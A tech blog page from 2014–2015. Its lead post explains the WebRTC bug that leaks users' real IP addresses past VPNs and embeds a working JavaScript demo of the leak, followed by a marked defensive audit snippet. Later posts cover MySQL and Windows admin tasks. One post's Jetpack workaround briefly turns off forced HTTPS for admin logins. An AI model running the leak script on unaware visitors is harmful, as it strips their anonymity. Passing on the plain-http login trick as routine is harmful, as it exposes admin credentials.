Hackviking He killed Chuck Norris, he ruled dancing so he took up a new hobby…

6 Feb 2015

WebRTC vulnerability exposes VPN users


It's now easy to expose the true IP address of VPN users. Daniel Roesler published an example of how to exploit the bug on GitHub. Firefox, Mozilla, Chrome and Internet Explorer (with WebRTC plugin) are vulnerable to this bug. WebRTC is used for peer-to-peer connections for video chat and other similar implementations.

If the user isn't using a VPN, the computer's internal network address will be exposed. WebRTC uses this mechanism to handle NAT on the network and to bind sessions to the public IP. However, the bug is really nasty because it exposes these functions to JavaScript, so the entire implementation below is written in JavaScript. The request is not registered in the developer console and cannot be blocked by plugins.

If the user is using a lightweight VPN client, like a Chrome plugin, the VPN will be bypassed altogether and both the real public IP and the internal NAT address will be shown.

Below is a demo. If you see your public and private IP addresses, your browser is vulnerable to this exploit.

Code cred: Daniel Roesler (I only modified it to run in WordPress).

Your local IP addresses:

    Your public IP addresses:

      <script>
      function getIPs(){
          var ip_dups = {};
          //compatibility for firefox and chrome
          var RTCPeerConnection = window.RTCPeerConnection
              || window.mozRTCPeerConnection
              || window.webkitRTCPeerConnection;
          var mediaConstraints = {
              optional: [{RtpDataChannels: true}]
          };
          //firefox already has a default stun server in about:config
          // media.peerconnection.default_iceservers =
          // [{"url": "stun:stun.services.mozilla.com"}]
          var servers = undefined;
          //add same stun server for chrome
          if(window.webkitRTCPeerConnection)
              servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
          //construct a new RTCPeerConnection
          var pc = new RTCPeerConnection(servers, mediaConstraints);
          //listen for candidate events
          pc.onicecandidate = function(ice){
              //skip non-candidate events
              if(!ice.candidate) return;
              //match just the IPv4 address; skip candidates that carry none
              var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/;
              var match = ip_regex.exec(ice.candidate.candidate);
              if(!match) return;
              var ip_addr = match[1];
              //remove duplicates
              if(ip_dups[ip_addr] !== undefined) return;
              ip_dups[ip_addr] = true;
              var li = document.createElement("li");
              li.textContent = ip_addr;
              //local IPs
              if (ip_addr.match(/^(192\.168\.|169\.254\.|10\.|172\.(1[6-9]|2\d|3[01]))/))
                  document.getElementById("localip").appendChild(li);
              //assume the rest are public IPs
              else
                  document.getElementById("publicip").appendChild(li);
          };
          //create a bogus data channel
          pc.createDataChannel("");
          //create an offer sdp
          pc.createOffer(function(result){
              //trigger the stun server request
              pc.setLocalDescription(result, function(){}, function(){});
          }, function(){});
      }
      </script>
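
A defensive check for the leak described above, as an added example that is not part of the original post or Daniel Roesler's code: it parses ICE candidate lines (the strings the demo's `onicecandidate` handler receives) and reports which addresses are visible to page script. The function names and sample candidates are constructed for illustration; the `.local` case covers browsers that replace host addresses with mDNS names.

```javascript
// Constructed sample candidates (private and documentation address ranges only).
const SAMPLE_CANDIDATES = [
  "candidate:1 1 udp 2122260223 192.168.1.23 54321 typ host",
  "candidate:2 1 udp 1686052607 203.0.113.7 54321 typ srflx raddr 192.168.1.23 rport 54321",
  "candidate:3 1 udp 2122260223 3f2a1c9e-0000-4000-8000-abcdefabcdef.local 54322 typ host",
  "candidate:4 1 udp 2122260223 10.8.0.2 54323 typ host",
];

// Same private ranges the page's demo treats as "local".
const PRIVATE_V4 = /^(192\.168\.|169\.254\.|10\.|172\.(1[6-9]|2\d|3[01])\.)/;

// Parse: candidate:<foundation> <component> <transport> <priority> <address> <port> typ <type>
function parseCandidate(line) {
  const m = /^(?:a=)?candidate:\S+ \d+ \S+ \d+ (\S+) \d+ typ (\S+)/.exec(line.trim());
  return m ? { address: m[1], type: m[2] } : null;
}

// Decide what kind of address a candidate exposes.
function classify(address) {
  if (/\.local$/i.test(address)) return "mdns-obfuscated"; // no literal IP disclosed
  if (!/^\d{1,3}(\.\d{1,3}){3}$/.test(address)) return "other"; // IPv6 and anything else
  return PRIVATE_V4.test(address) ? "private" : "public";
}

// Build a de-duplicated report of the addresses a page could read.
function auditCandidates(lines) {
  const report = { private: [], public: [], "mdns-obfuscated": [], other: [] };
  const seen = new Set();
  for (const line of lines) {
    const c = parseCandidate(line);
    if (!c || seen.has(c.address)) continue;
    seen.add(c.address);
    report[classify(c.address)].push(c.address);
  }
  // A leak in the page's sense: a literal private or public IPv4 address is exposed.
  report.leaks = report.private.length + report.public.length > 0;
  return report;
}

console.log(auditCandidates(SAMPLE_CANDIDATES));
```
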
      

      4 Feb 2015

      Amazon EC2 Linux – Add additional volumes


      Adding additional storage to your Amazon EC2 instance has several advantages. You can select the right storage type for the use. Why use a fast SSD-backed volume for storing nightly backups instead of magnetic storage, which is slower but comes at a much lower price?

      First you need to provision storage and assign it to your instance. Amazon provides a good guide on how to add additional volumes to your instances. There are several advantages to using several different volumes. As I wrote in my guide to moving MySQL storage, you will not risk filling up the boot disk, which would make the system halt. Other advantages include selecting storage that fits your purpose and price range, as mentioned above. External volumes can also easily be migrated between instances if and when you need that. It is also easier when you need to extend your storage space. Instead of making a snapshot of the entire instance and then launching a new one with a bigger drive, you can attach new storage and migrate the data. This approach will make the downtime much shorter.

      When selecting the correct storage for your solution there are a few things to keep in mind. EBS comes in three basic flavors, all with their benefits and disadvantages. It is therefore important to make an educated decision.

      4 Feb 2015

      Move MySQL database storage location

      It's always a good idea to keep storage away from the boot device. If you run out of space on the boot device the system will halt. If you make a new install it's easy enough to move your storage and you can do it from a cloud-init script like this:

      - mkdir /var/db
      - chown -R mysql:mysql /var/db
      - sed -i 's:datadir=/var/lib/mysql:datadir=/var/db:g' /etc/my.cnf
      - service mysqld start
      

      If the installation is already up and running you have to add steps for stopping the MySQL server and copying the database files:

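      # create the new data directory (the /var/db mount point used throughout this post)
      mkdir -p /var/db
      service mysqld stop
      # move the existing database files to the new location
      mv /var/lib/mysql/* /var/db
      chown -R mysql:mysql /var/db
      sed -i 's:datadir=/var/lib/mysql:datadir=/var/db:g' /etc/my.cnf
      service mysqld start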
      

      In these examples I have used /var/db, where I mounted the second storage device. You can however use any location you see fit. Points of interest in the command sequence:

      chown -R mysql:mysql /var/db

      Make sure that the mysql daemon has access to the storage location.

      sed -i 's:datadir=/var/lib/mysql:datadir=/var/db:g' /etc/my.cnf

      sed is a simple tool for search and replace inside text/config files directly from the command line. Here it searches for the line specifying the MySQL datadir location and replaces it with the new value.

      3 Feb 2015

      Unattended use of mysql_secure_installation

      After installing MySQL on any Linux distribution you run the mysql_secure_installation script, or at least you should! It will prompt you to set a new root password, remove anonymous access and a few other things. But what if you want this configuration to be done in a deployment or cloud-init script? The mysql_secure_installation command/script doesn't accept any parameters, so it can't be used for unattended installs. However, you can execute the same commands via the mysql command line tool as long as the service is started.

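      # set the root password (replace the {input_password_here} placeholder)
      mysql -e "UPDATE mysql.user SET Password=PASSWORD('{input_password_here}') WHERE User='root';"
      # remove root accounts that can log in from remote hosts
      mysql -e "DELETE FROM mysql.user WHERE User='root' AND Host NOT IN ('localhost', '127.0.0.1', '::1');"
      # remove anonymous users
      mysql -e "DELETE FROM mysql.user WHERE User='';"
      # remove the test database; IF EXISTS keeps the command from failing when it is absent
      mysql -e "DROP DATABASE IF EXISTS test;"
      # apply the changes
      mysql -e "FLUSH PRIVILEGES;"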
      

      I use this to provision new MySQL servers in the Amazon EC2 environment and it works like a charm. If this is used in a cloud-init script make sure to execute the sudo service mysqld start first!

      9 Jan 2015

      Webmatrix 3: Access dev site from other device


      Webmatrix 3 is a free tool by Microsoft for web development. It supports a range of languages, frameworks and CMSs, WordPress for instance. It automates the process of installing frameworks, compilers and database backends. It will quickly set up a development environment on your computer so you can start developing. Lately I have been using it to create a new responsive theme for this website. It works out of the box for testing on localhost, but not everybody is running 1080p monitors and I need to test on my phone, tablet and laptop as well. Out of the box it doesn't support this, but here is how you set it up.

      25 Nov 2014

      WordPress Download Manager 2.7.3 problems

      I have been using WordPress Download Manager for a long while. I have never been happy with it but the latest update just makes me cry! If you haven't upgraded yet, don't do it! If you already upgraded you probably ran into the same problems I did.

      All downloads gone - You have to go into the "Settings" page and migrate all your download packages.

      All download icons are gone - Nothing more to do than go into each and every package and select a new icon.

      Short codes like [wpdm_tree] don't work anymore - From now on you have to use a plugin, WPDM Extended Short-codes, for this. It isn't available in the plugin repository. You have to download it and install it manually.

      All the links to your download list generated by [wpdm_tree] return 404 Not found - This is true for both migrated downloads and new ones. This is probably because the new version uses a custom post type instead of linking to the actual file. It works fine in preview but doesn't work live. This probably has to do with permalink structures and so on, obviously not tested properly before release. I figured out that I had a regular post for each download with the link at the bottom, so I just edited the permalink for each download to the same slug as that page. The result is that the user is sent to the post with the download link at the bottom, which actually works.

      I have been thinking about finding a new solution for my downloads for a while, and now that timetable was just pushed up! I hope some of this information helps you get through some of the problems.

      11 Nov 2014

      Facebook API login flow for desktop application


      When developing desktop applications that interact with Facebook you have to implement the login flow yourself. After the login flow completes you can use the normal Facebook SDK libraries by supplying them with the access token you received. When implementing the login flow you have to make sure that you receive the access you requested. You can get a partial approval from the user and not be able to access all the scopes you need. In this example I have implemented the Facebook login flow in a C# .NET desktop application. Full source is available for download.

      4 Nov 2014

      Unable to connect Jetpack – SSL error


      Your website needs to be publicly accessible to use Jetpack: site_inaccessible
      Error Details: The Jetpack server was unable to communicate with your site https://www.hackviking.com [IXR -32300: transport error: http_request_failed SSL certificate problem: unable to get local issuer certificate]

      If you receive the error message above when trying to connect Jetpack for your WordPress site, there is a small problem with your SSL certificate. This is because the wordpress.com servers are unable to verify your SSL certificate chain. Your certificate is signed with an intermediate certificate from your supplier. Your server should supply that intermediate certificate, but if it doesn't, your browser already has the major intermediate certificates and can solve this issue itself. However, wordpress.com cannot take care of this if your server doesn't supply the intermediate certificate package.

      To solve this you should install the intermediate certificate package supplied by your CA on the server. If you don't have that kind of access to the server there is a workaround to get Jetpack up and running.

      In your wp-config.php find

      define('FORCE_SSL_ADMIN', true);
      

      and replace it with

      define('FORCE_SSL_ADMIN', false);
      

      Make sure you log in to the /wp-admin without https and then connect jetpack to wordpress.com. Now you can change the FORCE_SSL_ADMIN line back to true and it will all work.

      22 Oct 2014

      Free Team Foundation Server in the cloud


      During my professional career as a developer I have mostly been using Team Foundation Server (TFS) for source control. Back in the day I even used Source Safe, stone age history for most people. For my private projects or small startup projects the "files on disk with occasional zip backups" approach has been way too common. I have also used different Git solutions as well as Google Code. They work fine, but when you are used to TFS it's not as easy as you are used to. All the major cloud suppliers want to flirt with the startup community by offering free services that will keep the startups close when they grow bigger. We have seen several examples of this from Microsoft in the past, like BizSpark. Now they offer free Team Foundation Server in the cloud, called Team Foundation Service or Visual Studio Online. The basic account is free for up to five users with unlimited repositories. Support for both TFS and Git repositories!

      So far I have added two of my current projects and the performance is really good! There are also many ways to extend the service with your own code and REST APIs. You can also use free resources for builds, load testing and more. If you require more resources they can be purchased on a pay-for-what-you-use basis. If your project grows you can add additional team members for $20/month.

      20 Oct 2014

      How to change from IDE, ATA or RAID to AHCI


      I decided to break the RAID1 on my Dell M6500 so I could run Microsoft Server 2012 R2 along with my Windows 7 installation. When the RAID was deleted I thought it would be best to switch my SATA controller over to AHCI since I'm running two Corsair Force GT SSD drives. After changing to AHCI the computer blue screens during boot. I have done it several times before but not often enough to remember what needs to be enabled. This behavior is documented in Microsoft KB922976 (Error message occurs after you change the SATA mode of the boot drive) with automatic registry fix and all. However this is not the complete solution for all situations.

      According to the KB you need to enable loading of the AHCI driver, a no-brainer, and also enable the Intel AHCI controller driver. But what is not included in the KB article is that the ATAPI driver also needs to be enabled for it to work. If you are changing from ATA to AHCI it is already enabled, provided your computer booted with the ATA setting.

      So according to the KB you should set these two registry keys to "0":

      HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Msahci\Start
      HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\IastorV\Start

      But you should also check that this one is set to "0":

      HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\atapi\Start

      You can also run these commands instead:

      REG ADD HKLM\System\CurrentControlSet\Services\msahci /v Start /d 0 /f /t REG_DWORD
      REG ADD HKLM\System\CurrentControlSet\Services\IastorV /v Start /d 0 /f /t REG_DWORD
      REG ADD HKLM\System\CurrentControlSet\Services\atapi /v Start /d 0 /f /t REG_DWORD
      

      Now your computer will start without the blue screen!